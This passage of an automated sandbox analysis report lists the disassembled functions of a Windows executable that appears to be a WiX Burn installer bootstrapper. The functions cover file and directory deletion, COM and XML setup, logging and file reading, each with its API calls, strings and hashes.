315->329 330 8e5f60-8e5f69 call 8e5c81 315->330 316->278 319 8e5fba-8e5fcd SetFileAttributesW 317->319 320 8e600b-8e6019 DeleteFileW 317->320 319->320 324 8e5fcf-8e5fd9 GetLastError 319->324 320->316 322 8e601f-8e6023 320->322 325 8e607a-8e6084 GetLastError 322->325 326 8e6025-8e6042 call 8e4b8a 322->326 327 8e5fdb-8e5fe4 324->327 328 8e5fe6 324->328 332 8e6086-8e608f 325->332 333 8e6091 325->333 344 8e611a-8e6129 326->344 345 8e6048-8e6062 MoveFileExW 326->345 327->328 335 8e5fec-8e5ff2 328->335 336 8e60f2 328->336 329->218 343 8e5f6e-8e5f70 330->343 332->333 339 8e612e 333->339 340 8e6097-8e609d 333->340 341 8e5ffc 335->341 342 8e5ff4-8e5ffa 335->342 338 8e60f7-8e610a call 8e1225 336->338 361 8e610f-8e6115 338->361 350 8e6133-8e614b call 8e1225 339->350 346 8e609f-8e60a5 340->346 347 8e60a7 340->347 351 8e5ffe-8e6000 341->351 342->341 342->351 343->316 348 8e5f76-8e5f7b 343->348 344->302 353 8e6064 345->353 354 8e6072-8e6078 345->354 346->347 357 8e60a9-8e60ab 346->357 347->357 348->316 352 8e5f81-8e5f9f call 8e1228 348->352 350->361 351->338 358 8e6006 351->358 352->316 359 8e606a-8e6070 MoveFileExW 353->359 354->359 357->316 357->350 358->316 359->316 361->218
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00000000,00000001), ref: 008E5CE9
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 008E5CF4
                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,00000000,00000001), ref: 008E5D73
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 008E5D7D
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNELBASE(?,?,?,*.*,?,?,?,?,?,00000000,00000001), ref: 008E5E67
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 008E5E78
                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,00000105,?,00000104,00000000,00000000,00000A00,?,?,?,?), ref: 008E5FC5
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 008E5FCF
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNELBASE(?,?,?,?,?,00000105,?,00000104,00000000,00000000,00000A00,?,?,?,?,00000000), ref: 008E6011
                                                                                                                                                                                                                                                                            • MoveFileExW.KERNEL32(?,?,00000001,?,DEL,00000000,?,?,?,?,?,00000000,00000001), ref: 008E6056
                                                                                                                                                                                                                                                                            • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,00000000,00000001), ref: 008E606A
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 008E607A
                                                                                                                                                                                                                                                                            • FindNextFileW.KERNELBASE(000000FF,?,?,?,?,?,00000105,?,00000104,00000000,00000000,00000A00,?,?,?,?), ref: 008E60BF
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 008E614D
                                                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNELBASE(?,?,?,?,?,00000000,00000001), ref: 008E615F
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 008E616D
                                                                                                                                                                                                                                                                            • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,00000000,00000001), ref: 008E6195
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(000000FF,?,?,?,?,d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp,00000149,8000FFFF,?,?,?,?,00000000,00000001), ref: 008E62B0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$ErrorLast$AttributesFindMove$CloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                                                            • String ID: *.*$DEL$Directory delete cannot delete file: %ls$Failed to concat filename '%ls' to directory: %ls$Failed to concat wild cards to string: %ls$Failed to delete file: %ls$Failed to delete subdirectory; continuing: %ls$Failed to ensure file name was null terminated.$Failed to ensure path is backslash terminated: %ls$Failed to get attributes for path: %ls$Failed to get temp directory.$Failed to get temp file to move to.$Failed to remove attributes from file: %ls$Failed to remove directory: %ls$Failed to remove read-only attribute from path: %ls$Failed while looping through files in directory: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp$failed to get first file in directory: %ls
                                                                                                                                                                                                                                                                            • API String ID: 3695804116-305978383
                                                                                                                                                                                                                                                                            • Opcode ID: b774ba4d7644364803ffa11639a60f37e3d8332451e6ad26e81a4cdff08973fb
                                                                                                                                                                                                                                                                            • Instruction ID: 3ff74293b34fee02c64116ea2bb587413a02bc8c4dfed4ae3f2bb15dd9cd5d5e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b774ba4d7644364803ffa11639a60f37e3d8332451e6ad26e81a4cdff08973fb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5EF13972E406B976EB3156268C0AFAE6568FB53B68F014194FF04FA1D1F6B08D80CB95
                                                                                                                                                                                                                                                                            Function 0093FE01 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 198libraryloadercomCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 1125 93fe01-93fe29 GetModuleHandleA 1126 93fea6-93feb4 GetProcAddress 1125->1126 1127 93fe2b-93fe35 GetLastError 1125->1127 1130 93ff16-93ff35 CoCreateInstance 1126->1130 1131 93feb6-93fee6 GetProcAddress * 3 1126->1131 1128 93fe42 1127->1128 1129 93fe37-93fe40 1127->1129 1132 93fe44 1128->1132 1133 93fe49-93fe6c call 8e1225 call 8e1228 1128->1133 1129->1128 1134 93ff37-93ff41 1130->1134 1135 93ff58-93ff5a 1130->1135 1136 93ff12 1131->1136 1137 93fee8-93feea 1131->1137 1132->1133 1157 93fe6f-93fe74 1133->1157 1138 93ff46-93ff53 call 8e1228 1134->1138 1141 93ff5f-93ff6f 1135->1141 1136->1130 1137->1136 1140 93feec-93feee 1137->1140 1151 940013-940017 1138->1151 1140->1136 1144 93fef0-93ff10 1140->1144 1145 93ff71-93ff75 1141->1145 1146 93ff79 1141->1146 1144->1130 1145->1141 1149 93ff77 1145->1149 1150 93ff7b-93ff8b 1146->1150 1154 93ff93 1149->1154 1155 93ff99-93ff9d 1150->1155 1156 93ff8d-93ff91 1150->1156 1151->1157 1158 94001d-94002c 1151->1158 1154->1155 1159 93fff7-940008 1155->1159 1160 93ff9f-93ffb2 call 94003b 1155->1160 1156->1150 1156->1154 1162 93fe86-93fe8b 1157->1162 1163 93fe76-93fe84 1157->1163 1158->1157 1176 940032-940034 ExitProcess 1158->1176 1159->1151 1164 94000a-940011 1159->1164 1170 93ffc5-93ffe1 1160->1170 1171 93ffb4-93ffc3 1160->1171 1167 93fe9d-93fea3 1162->1167 1168 93fe8d-93fe9b 1162->1168 1163->1162 1164->1151 1168->1167 1170->1159 1180 93ffe3-93fff2 1170->1180 1171->1138 1180->1138
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,008E7DDB,?,00940662,00000000,008E7D5B,00000000,?,?,009040B9,?,?,008E7D5B,?), ref: 0093FE1F
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00940662,00000000,008E7D5B,00000000,?,?,009040B9,?,?,008E7D5B,?,?,?,?,?), ref: 0093FE2B
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0093FEAC
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0093FEBC
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 0093FECB
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0093FED9
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(0097D6D8,00000000,00000001,0094E8F8,008E7D5B,?,00940662,00000000,008E7D5B,00000000,?,?,009040B9,?,?,008E7D5B), ref: 0093FF2B
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00940034
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                                                                                                                                                                                                                                            • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlCreateElement$failed appendChild$failed to create XML DOM Document$failed to get handle to kernel32.dll$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 2124981135-1573969316
                                                                                                                                                                                                                                                                            • Opcode ID: d6f5c3999ba31702e2e640118ececbddcb40ae7615f33020cfa13c18a399abfa
                                                                                                                                                                                                                                                                            • Instruction ID: c4800fe94b873ceb93ba3ff3ce47197b13eb0a3558912c905a5faa10dd89bab1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6f5c3999ba31702e2e640118ececbddcb40ae7615f33020cfa13c18a399abfa
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD61BE35E40315ABDB259F648C59F6E7BA8FF86B00F114069F909E7291DB708D41DF50
                                                                                                                                                                                                                                                                            Function 0093A805 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 168threadtimeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0097D4F0,00000000,00000000,--- logging level: %hs ---,00971670,00000000,?,008E7B05,00000003), ref: 0093A833
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,008E7B05,00000003), ref: 0093A843
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0093A84C
                                                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(008E7B05,?,008E7B05,00000003), ref: 0093A862
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(0097D4F0,?,?,?,00000000,0000FDE9,?,008E7B05,00000003), ref: 0093A9CB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to write string to log using default function: %ls, xrefs: 0093A9AA
                                                                                                                                                                                                                                                                            • Failed to format line prefix., xrefs: 0093A914
                                                                                                                                                                                                                                                                            • Failed to write string to log using redirected function: %ls, xrefs: 0093A98A
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\logutil.cpp, xrefs: 0093A923, 0093A9B9
                                                                                                                                                                                                                                                                            • Failed to convert log string to UTF-8, xrefs: 0093A955
                                                                                                                                                                                                                                                                            • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 0093A8FF
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                                                                                                                                                                                                                            • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls$Failed to convert log string to UTF-8$Failed to format line prefix.$Failed to write string to log using default function: %ls$Failed to write string to log using redirected function: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\logutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 296830338-1339504754
                                                                                                                                                                                                                                                                            • Opcode ID: f0f5861888e5101df4e170dec5c2678f12514fbb722c4de0ca018b996492e9b1
                                                                                                                                                                                                                                                                            • Instruction ID: 1254fab0e54146c518204414a6c99a4b36b1426a61dc38ddb978790f1553b5aa
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0f5861888e5101df4e170dec5c2678f12514fbb722c4de0ca018b996492e9b1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C651C572E01219BBDB218BA9CC0AFBF77B8EF08B54F014015F944F6290D2749D41DBA2
                                                                                                                                                                                                                                                                            Function 0093A747 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FormatMessageW.KERNEL32(00000900,?,?,00000000,00000002,00000000,00000000,00000000,?,?,0093B0B3,009050E1,?,?,00000000,00000001), ref: 0093A766
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0093B0B3,009050E1,?,?,00000000,00000001,?,008E812D,009050E1,?,00000000,?,?,009050E1,00000002), ref: 0093A772
                                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,009050E1,?,00000002,?,?,0093B0B3,009050E1,?,?,00000000,00000001,?,008E812D,009050E1,?), ref: 0093A7F8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\logutil.cpp$failed to log id: %d
                                                                                                                                                                                                                                                                            • API String ID: 1365068426-1219654922
                                                                                                                                                                                                                                                                            • Opcode ID: d2f626bade2e2397862eaad6787827fef7ace8d74caad995d49bb6c00727bdc1
                                                                                                                                                                                                                                                                            • Instruction ID: e3d10c406c61bfcda51891a7273b9f834d7beddf54a7754f6e79d46332bcd46f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2f626bade2e2397862eaad6787827fef7ace8d74caad995d49bb6c00727bdc1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7521C076A01129BFDB219F94DC86EAF3A7DEF85750F014019FE02A6161D7308E11EAA2
                                                                                                                                                                                                                                                                            Function 008FED3B Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 92fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DecryptFileW.ADVAPI32(?,00000000), ref: 008FEDF1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: DecryptFile
                                                                                                                                                                                                                                                                            • String ID: Failed to copy working folder.$No usable base working folder found.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3257575229-4136860833
                                                                                                                                                                                                                                                                            • Opcode ID: 915b7a3341e4486f7f6633bf626409dfec09444a39fde2144ce5aae3b7437667
                                                                                                                                                                                                                                                                            • Instruction ID: 9b37cbfbe1e8e3e153b414d4f5ac00c64cd765c2a300dcba934a1913a0fe749d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 915b7a3341e4486f7f6633bf626409dfec09444a39fde2144ce5aae3b7437667
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C631F731A40619FFD722EA79CC45FBEBA68FF04715F108124F604EA1A1D7B0AE10DBA0
                                                                                                                                                                                                                                                                            Function 008E540B Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1357844191-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1d1a8c19a94fc9a6b49e827f704a44022d7d0868317258efd9f75afc26319b46
                                                                                                                                                                                                                                                                            • Instruction ID: bb771aa708d6e7e2f9ad7a67983e0a7c9110b6a9ae028077d07eb68ea650c5ff
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d1a8c19a94fc9a6b49e827f704a44022d7d0868317258efd9f75afc26319b46
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17C012361A8208A7CB006FF4DC0AC85779CB7556027008510B515C2010C678E0509760
                                                                                                                                                                                                                                                                            Function 008EDB61 Relevance: 95.2, APIs: 24, Strings: 30, Instructions: 688fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 0 8edb61-8edbd6 call 927460 * 2 5 8edc18-8edc1e 0->5 6 8edbd8-8edbe2 GetLastError 0->6 9 8edc22-8edc32 SetFilePointerEx 5->9 10 8edc20 5->10 7 8edbef 6->7 8 8edbe4-8edbed 6->8 11 8edbf6-8edc13 call 8e1225 7->11 12 8edbf1 7->12 8->7 13 8edc74-8edc8c ReadFile 9->13 14 8edc34-8edc3e GetLastError 9->14 10->9 29 8ee3ea-8ee3f0 call 8e1228 11->29 12->11 15 8edcce-8edcd5 13->15 16 8edc8e-8edc98 GetLastError 13->16 18 8edc4b 14->18 19 8edc40-8edc49 14->19 23 8edcdb-8edce4 15->23 24 8ee3c6-8ee3e8 call 8e1225 15->24 20 8edc9a-8edca3 16->20 21 8edca5 16->21 25 8edc4d 18->25 26 8edc52-8edc6f call 8e1225 18->26 19->18 20->21 27 8edcac-8edcc9 call 8e1225 21->27 28 8edca7 21->28 23->24 31 8edcea-8edcfc SetFilePointerEx 23->31 24->29 25->26 26->29 27->29 28->27 49 8ee3f3-8ee403 call 9267e6 29->49 36 8edd3e-8edd59 ReadFile 31->36 37 8edcfe-8edd08 GetLastError 31->37 39 8edd9b-8edda2 36->39 40 8edd5b-8edd65 GetLastError 36->40 43 8edd0a-8edd13 37->43 44 8edd15 37->44 47 8edda8-8eddb2 39->47 48 8ee3a0-8ee3c4 call 8e1225 39->48 45 8edd67-8edd70 40->45 46 8edd72 40->46 43->44 50 8edd1c-8edd39 call 8e1225 44->50 51 8edd17 44->51 45->46 54 8edd79-8edd96 call 8e1225 46->54 55 8edd74 46->55 47->48 56 8eddb8-8edddd SetFilePointerEx 47->56 48->29 50->29 51->50 54->29 55->54 61 8ede1f-8ede3a ReadFile 56->61 62 8edddf-8edde9 GetLastError 56->62 64 8ede7c-8ede97 ReadFile 61->64 65 8ede3c-8ede46 GetLastError 61->65 67 8eddeb-8eddf4 62->67 68 8eddf6 62->68 73 8eded9-8edef6 SetFilePointerEx 64->73 74 8ede99-8edea3 GetLastError 64->74 71 8ede48-8ede51 65->71 72 8ede53 65->72 67->68 69 8eddfd-8ede1a call 8e1225 68->69 70 8eddf8 68->70 69->29 70->69 71->72 78 8ede5a-8ede77 call 8e1225 72->78 79 8ede55 72->79 76 8edf38-8edf5a ReadFile 73->76 77 8edef8-8edf02 GetLastError 73->77 80 8edea5-8edeae 74->80 81 8edeb0 74->81 88 8edfbc-8edfc6 GetLastError 76->88 89 8edf5c-8edf5e 76->89 85 8edf0f 77->85 86 8edf04-8edf0d 77->86 78->29 79->78 80->81 82 8edeb7-8eded4 call 8e1225 81->82 83 8edeb2 81->83 82->29 83->82 93 8edf16-8edf33 call 8e1225 85->93 94 8edf11 85->94 86->85 91 8edfc8-8edfd1 88->91 92 8edfd3 88->92 96 8edf5f-8edf66 89->96 91->92 98 8edfda-8ee009 call 8e1225 call 8e1228 92->98 99 8edfd5 92->99 93->29 94->93 101 8edf6c-8edf78 96->101 102 8ee36a-8ee38e call 8e1225 96->102 98->49 99->98 103 8edf7a-8edf81 101->103 104 8edf87-8edf90 101->104 113 8ee393-8ee39e call 8e1228 102->113 103->104 108 8ee00e-8ee015 103->108 109 8edf96-8edfba ReadFile 104->109 110 8ee321-8ee338 call 8e1225 104->110 116 8ee047-8ee05e call 8e540b 108->116 117 8ee017-8ee042 call 8e1225 108->117 109->88 109->96 125 8ee33d-8ee34c call 8e1228 110->125 113->49 127 8ee08f-8ee0a4 SetFilePointerEx 116->127 128 8ee060-8ee08a call 8e1225 116->128 117->113 139 8ee34e 125->139 131 8ee0ef-8ee112 ReadFile 127->131 132 8ee0a6-8ee0b0 GetLastError 127->132 128->29 134 8ee14b-8ee157 131->134 135 8ee114-8ee11e GetLastError 131->135 137 8ee0bd 132->137 138 8ee0b2-8ee0bb 132->138 143 8ee17a-8ee17e 134->143 144 8ee159-8ee175 call 8e1225 134->144 140 8ee12b 135->140 141 8ee120-8ee129 135->141 145 8ee0bf 137->145 146 8ee0c4-8ee0d6 call 8e1225 137->146 138->137 142 8ee351-8ee359 139->142 147 8ee12d 140->147 148 8ee132-8ee149 call 8e1225 140->148 141->140 142->49 149 8ee35f-8ee365 call 8e55c9 142->149 152 8ee1bb-8ee1c4 143->152 153 8ee180-8ee1a6 call 8e1225 143->153 144->125 145->146 166 8ee0db-8ee0ea call 8e1228 146->166 147->148 148->166 149->49 154 8ee1c6-8ee1f1 call 8e1225 152->154 155 8ee1f3-8ee206 call 943b63 152->155 167 8ee1ab-8ee1b6 call 8e1228 153->167 154->167 173 8ee208-8ee21a 155->173 174 8ee224-8ee234 155->174 166->139 167->142 173->174 176 8ee23e-8ee246 174->176 177 8ee236-8ee23c 174->177 178 8ee248-8ee250 176->178 179 8ee252-8ee255 176->179 180 8ee257-8ee2b1 call 8e540b 177->180 178->180 179->180 183 8ee2e2-8ee303 call 9275c0 call 8ed84a 180->183 184 8ee2b3-8ee2d8 call 8e1225 180->184 183->142 191 8ee305-8ee317 call 8e1225 183->191 184->183 191->110
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,008E6C5C,00000000,008E6570), ref: 008EDBD8
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDC2A
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,008E6C5C,00000000,008E6570), ref: 008EDC34
                                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(008E6570,008E6C78,00000040,?,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDC84
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,008E6C5C,00000000,008E6570), ref: 008EDC8E
